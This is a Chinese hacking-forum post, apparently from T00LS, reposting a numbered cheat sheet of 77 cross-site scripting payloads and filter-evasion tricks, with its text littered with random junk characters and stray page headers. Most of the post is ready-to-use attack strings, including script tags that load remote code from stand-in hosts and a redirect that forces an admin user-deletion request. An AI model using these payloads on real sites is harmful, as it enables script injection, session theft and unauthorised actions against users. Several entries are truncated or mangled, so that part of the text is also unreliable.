貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! R, l T$ U7 z4 }4 k(1)普通的XSS JavaScript注入
) V# t* I: p4 u3 v. c7 d% @1 }8 ]<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, e- E" Q2 ^2 q% {' c" T
(2)IMG标签XSS使用JavaScript命令
" G) A) l( a7 O2 M0 n% K" \<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 H2 K- ~& I# X2 K. q. {: C3 {8 r(3)IMG标签无分号无引号
/ x4 m$ E* C7 e' J( Y<IMG SRC=javascript:alert(‘XSS’)>
/ `( x0 b" {! q7 }& P(4)IMG标签大小写不敏感2 ^, |6 h! h" N6 v3 f; N& w
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>+ l, n4 m2 I/ [. b& T0 T. \( ~
(5)HTML编码(必须有分号)- V* s! |" m' I9 j% {% e% V9 J
<IMG SRC=javascript:alert(“XSS”)>; X3 d# l* d. e: Q, p0 m4 `
(6)修正缺陷IMG标签/ m3 \6 W7 L3 [8 ^$ e. Q8 q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( o- \" A: k! g m5 ?1 X# h
2 E7 L- P/ ~" n& o/ ^% v% V
" q) Z. B3 a% j: q) U6 k
(7)formCharCode标签(计算器)
' z9 r! L, G( x( `0 a+ ^8 f<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& s0 \2 C7 s4 J+ p(8)UTF-8的Unicode编码(计算器)' w0 N% i: e" p E0 D8 [
<IMG SRC=jav..省略..S')>8 t) Q9 {( T" v; G$ `" g' ]8 S
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# J' U2 w% c- X1 R3 g3 k1 C<IMG SRC=jav..省略..S')>1 K/ z$ F6 S0 L+ s
(10)十六进制编码也是没有分号(计算器)& |" j; Y0 G- I+ `
<IMG SRC=java..省略..XSS')>
5 O6 r) ~& s$ H(11)嵌入式标签,将Javascript分开
" @$ I+ [! M8 i<IMG SRC=”jav ascript:alert(‘XSS’);”>
, H) o+ I% S& r% |) R(12)嵌入式编码标签,将Javascript分开
) C! W# t6 k e: ^1 j$ ~0 Y7 \<IMG SRC=”jav ascript:alert(‘XSS’);”>% g1 ?2 L; T) H* s! }; X9 h
(13)嵌入式换行符) d, V- j! \. f" z& c
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 ^1 R6 \" d) ]; L1 e
(14)嵌入式回车
; U* _. m* ` ?) z<IMG SRC=”jav ascript:alert(‘XSS’);”>
% ?! b: o" D! K: |( c) @9 j(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ b$ Q; y- _% z7 W<IMG SRC=”javascript:alert(‘XSS‘)”>% @/ T. [8 A/ w) b8 ^. {
(16)解决限制字符(要求同页面)
) l1 j6 V8 f1 T" ]<script>z=’document.’</script>4 q# A5 g; ^8 F
<script>z=z+’write(“‘</script>
: ` T8 p! G0 @1 @4 [<script>z=z+’<script’</script>3 k) Z/ L& m7 j! M/ D0 u) W: k. q
<script>z=z+’ src=ht’</script>, V) [- m& M5 Z1 h6 C3 Q% V" M# R1 D
<script>z=z+’tp://ww’</script>
2 V& K' Y% [) r. K<script>z=z+’w.shell’</script>% ?) K: m, t& ?, }, N8 _! t
<script>z=z+’.net/1.’</script>2 H- L6 p' o& i
<script>z=z+’js></sc’</script>- H; {/ @! l/ F% W( @4 {" Q) V
<script>z=z+’ript>”)’</script>4 {- L/ e/ S3 S- l3 n$ L# w
<script>eval_r(z)</script>. g6 ]* s3 I7 C, d t: ~+ X0 O
(17)空字符12-7-1 T00LS - Powered by Discuz! Board% M, p( B# f: {# w* S! `* F
https://www.t00ls.net/viewthread ... table&tid=15267 2/6( Q `% c) `6 [% z5 J4 @) z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' }' L& ~1 a2 W, n9 n" R. h7 U- \0 u(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
e, m& @7 L1 `5 s$ qperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 N- f: ^1 b) N1 O Z' {
(19)Spaces和meta前的IMG标签
8 d6 m$ t: S; z. @4 Z<IMG SRC=” javascript:alert(‘XSS’);”>
( r, e1 ]; H8 H4 V(20)Non-alpha-non-digit XSS
) a3 @' U! }# W6 }, V2 b5 }<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" E- y. K% C$ v) Z9 {0 r8 \7 n( g(21)Non-alpha-non-digit XSS to 2
- J' `! w9 f; h6 P; T, F8 o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* t$ W% f$ K5 _. K) F/ A& e, G/ w, ~(22)Non-alpha-non-digit XSS to 3
! S$ a! B9 C! z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! Z( ^/ K& R4 F' M% Q) e
(23)双开括号
+ I! B' b4 N( V; I# s0 u( i<<SCRIPT>alert(“XSS”);//<</SCRIPT>% S5 F, v/ x0 p% r
(24)无结束脚本标记(仅火狐等浏览器)
: N; V+ M( l Q3 g# I w9 J2 F" a5 i<SCRIPT SRC=http://3w.org/XSS/xss.js?<B># m' \4 R [' }; V' Y4 ]3 y2 |+ Z. G1 U" U6 L
(25)无结束脚本标记2, I X5 z0 R' b" n% S. x
<SCRIPT SRC=//3w.org/XSS/xss.js>
^, }/ t0 d' t; ]# k2 q# N# E(26)半开的HTML/JavaScript XSS( A# o1 H. ]0 k
<IMG SRC=”javascript:alert(‘XSS’)”
& O3 G& G1 [) j4 @3 j9 K5 }(27)双开角括号$ I8 R2 |4 ?" i! R+ a4 i
<iframe src=http://3w.org/XSS.html <
: f$ y$ k/ i$ F(28)无单引号 双引号 分号
; y9 R* K/ ?* r4 _: m<SCRIPT>a=/XSS/
. |& Z, N* S/ P% ?) A, K- Walert(a.source)</SCRIPT>- U7 s: F9 x3 m' [- c, G
(29)换码过滤的JavaScript- E. M4 p; Q3 L- `6 b( }0 ?
\”;alert(‘XSS’);//
. }: K6 `( \: m# l0 K(30)结束Title标签5 n1 P6 o' ^ U* t% f, t6 ]
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 R6 `9 D8 C% \(31)Input Image0 i9 s1 N! G# L" W1 @6 b B
<INPUT SRC=”javascript:alert(‘XSS’);”>' Z& @2 D, f5 J" g2 T
(32)BODY Image
7 @# `; n' l' a1 q# ] ^$ Z<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, F+ d7 a9 `5 q9 V' A! U0 k. f
(33)BODY标签" H- c, n8 J9 q' ]
<BODY(‘XSS’)>9 [0 d' a7 H& u `( Q* V7 I
(34)IMG Dynsrc/ d" K& R# N2 c" M, e% h
<IMG DYNSRC=”javascript:alert(‘XSS’)”>* s6 R. F) H$ ]* }) I
(35)IMG Lowsrc" q7 h9 V8 O) P) V; O5 W+ G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>5 e# R+ Z6 v1 ~* g
(36)BGSOUND" C. {& K( P$ R( ~7 U
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 O" E/ I0 \! G(37)STYLE sheet
8 c4 K* W* i: Q+ K" g+ P' n8 D5 P<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ Q* |! H- H8 [0 a" |* {0 i(38)远程样式表9 C) z; R% G) l. J0 {
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( ^7 u: L: I! e0 ]
(39)List-style-image(列表式) d; z9 i/ L j7 t. r2 l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 d: B2 ^( J4 F3 ~+ U1 v; r* B(40)IMG VBscript
: I+ X8 d' Z- J+ X5 k) [<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS* O+ s0 m7 j' x- @
(41)META链接url
* }% _4 M* M" b# Z) R4 {9 w3 C5 f( f: V/ l. |6 v5 @( O; E/ [
" F0 f& L- L$ H8 v<META HTTP-EQUIV=”refresh” CONTENT=”0;
4 B! [! N7 a7 b1 F- g9 [4 o! pURL=http://;URL=javascript:alert(‘XSS’);”>/ f( K* n2 L$ Z
(42)Iframe
' F5 y* K ?6 ~* O$ M4 y4 M% c: k<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>' h' \! L. o- X3 v! C4 ]" M
(43)Frame
; I4 J) h6 n* J- y9 ]# p2 h<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board9 f4 | j7 Q* R# s
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
6 _& T5 o, X) C4 e9 d; D(44)Table6 |. p) r4 k9 {
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ p" ^- n* X# B$ Y& g; S
(45)TD
. k5 h" x$ L# e+ ]- @7 w" I% P<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- r( z6 r; N8 @: u+ v/ j" y(46)DIV background-image
8 T5 ?# }( W' P8 s ^<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( ?) i' u: ^; A: s5 V- j(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
. L1 [0 M1 f5 n6 c" t; J, ~& {8&13&12288&65279)2 \7 i }7 d- }8 G7 S1 Q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( Z; ^& a+ V+ {* b# B- R6 c! K- a l(48)DIV expression0 o+ n0 V9 e, P* a6 T
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 @" [* G; _+ |8 U+ ]
(49)STYLE属性分拆表达
; y3 K- j9 h1 |5 o h9 I3 c<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># [. C Q" k0 H' W( I3 ~5 Z Y: W
(50)匿名STYLE(组成:开角号和一个字母开头)
( k5 c$ l x& @+ l& \: g: X9 E<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ J! J. l' o! C$ t, C- Q(51)STYLE background-image" [2 k7 v5 L* C% h l& t7 a" q8 d
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A( I* M% ~2 y! {. T) c' r' y
CLASS=XSS></A>: `! d- E% W% E( ?( D% E
(52)IMG STYLE方式: M& b0 r, G' ~; L0 n! W* W) Q
exppression(alert(“XSS”))’>
n' ? w4 ?* }(53)STYLE background
/ D- U0 k. d6 j# |- Y6 C. |<STYLE><STYLE
2 ~ b* K, c7 Z4 ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 R: ?; a; V X2 O' }& F6 Y$ B(54)BASE! R/ j7 B8 d! Y# |: V
<BASE HREF=”javascript:alert(‘XSS’);//”>
- O Z U7 k1 f, ^) d(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) j: x: a3 d$ y1 c1 [
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
- D4 g. l1 M& b(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 O3 k: Z! y) G6 } @. ma=”get”;
: R5 d& v, N1 ?4 kb=”URL(\”";
# {2 ]( F, D1 ~4 W- q& Jc=”javascript:”;
, v& e6 } P7 L; r. B5 W( s; ^! sd=”alert(‘XSS’);\”)”;
2 I! A7 `" B7 Y6 c9 b& _% k" Z+ P8 Ceval_r(a+b+c+d);
5 ]7 ? C) Y7 o0 V Z(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 O: Z$ G. M7 o! [% e$ X0 w% O<HTML xmlns:xss>7 o+ j" @3 A0 L6 _& h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) Z+ `# s9 [2 ^9 Q! _% }<xss:xss>XSS</xss:xss>
% I/ y; f4 h2 N' f</HTML>
! v$ N/ Y9 T7 W( O; Y(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
: q! B- T: q1 Z" q. a<SCRIPT SRC=””></SCRIPT>
2 Z$ R) a$ X7 V* k* O R; _(59)IMG嵌入式命令,可执行任意命令
$ ^% ^& h* s4 z4 J2 ?# i W<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 ` \3 L. G$ Q6 u3 v
(60)IMG嵌入式命令(a.jpg在同服务器)( W$ B8 t, @0 C8 Z" Q
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser X* T( N6 n( w* D, v+ k
(61)绕符号过滤& P. i- L8 S7 g9 e
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 L0 ~+ {2 W; A7 \0 c! M$ x2 g. w( l
(62); u$ g3 E1 ~. W% |
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 O% ~$ \% J& Q- e: S. C, n2 I, [& b' w(63)
) C: H; a& O9 ]9 Y4 V<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! m% d5 u2 t! J' m; }3 ^1 e, }
(64)) D* S/ p' B' L) O! O
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% {' C& `; r, i# Q% W E2 U0 g(65)- Q' r) U; V6 o; ~7 `( `+ _7 Z9 T' ]
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>3 Y ~# @; C: I) c
(66)12-7-1 T00LS - Powered by Discuz! Board f9 o$ r4 Z) V, |
https://www.t00ls.net/viewthread ... table&tid=15267 4/6. I: f: H' o* Y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 g/ d/ q R' g# X1 h% y) _* d(67): u, L: a T# A. v& a4 h
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
: v Z# A. ?8 M</SCRIPT># s, x8 x$ V; i% _
(68)URL绕行
5 Y# ? y) B1 M; e. d5 M( I) G<A HREF=”http://127.0.0.1/”>XSS</A>
, `8 q3 X; g: m6 N(69)URL编码
! g* j# |$ t# x, j X9 s& L. |<A HREF=”http://3w.org”>XSS</A>' K, z: a# P; u5 f& l# ~
(70)IP十进制+ D+ X3 I2 U3 h
<A HREF=”http://3232235521″>XSS</A># Q# j4 R9 X- O$ T* J4 `5 t' o+ u
(71)IP十六进制
- a" g' V3 R* _<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
- i ^7 M# t. x I2 I( p" ?9 h) J(72)IP八进制. k( A4 ]; h! |) |0 r3 @5 s6 z7 Q8 K
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# j& X3 ~/ S) `$ j" w5 w8 Y# r) _+ ~(73)混合编码 }# p& C. x2 u0 f& |) f* {
<A HREF=”h
- \+ j9 Q/ T: y9 N0 v3 N7 Ytt p://6 6.000146.0×7.147/”">XSS</A>
5 Y; `6 h3 O4 x(74)节省[http:]
+ c B5 L4 t4 C( A2 W" o<A HREF=”//www.google.com/”>XSS</A>
& K1 R+ t' E1 V/ \; R5 E `(75)节省[www]- q' t. o* x9 K9 [+ Z% Y e
<A HREF=”http://google.com/”>XSS</A>
i; P$ y8 h; O: ?- u(76)绝对点绝对DNS# [8 G/ J5 o+ p) h+ m5 ~
<A HREF=”http://www.google.com./”>XSS</A>
& P, z6 Z- H, Z' e' W(77)javascript链接+ D1 J( S0 P) y8 k; r: a6 t
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 J" Z4 U6 v, Q8 h$ [ @' s% `; ]* A- X: f' C
原文地址:http://fuzzexp.org/u/0day/?p=14+ J- {! E1 |6 O/ [+ N1 d
2 {, b3 y$ H& [1 u5 e
|
发表于 2013-4-19 19:22:37
收藏
支持
反对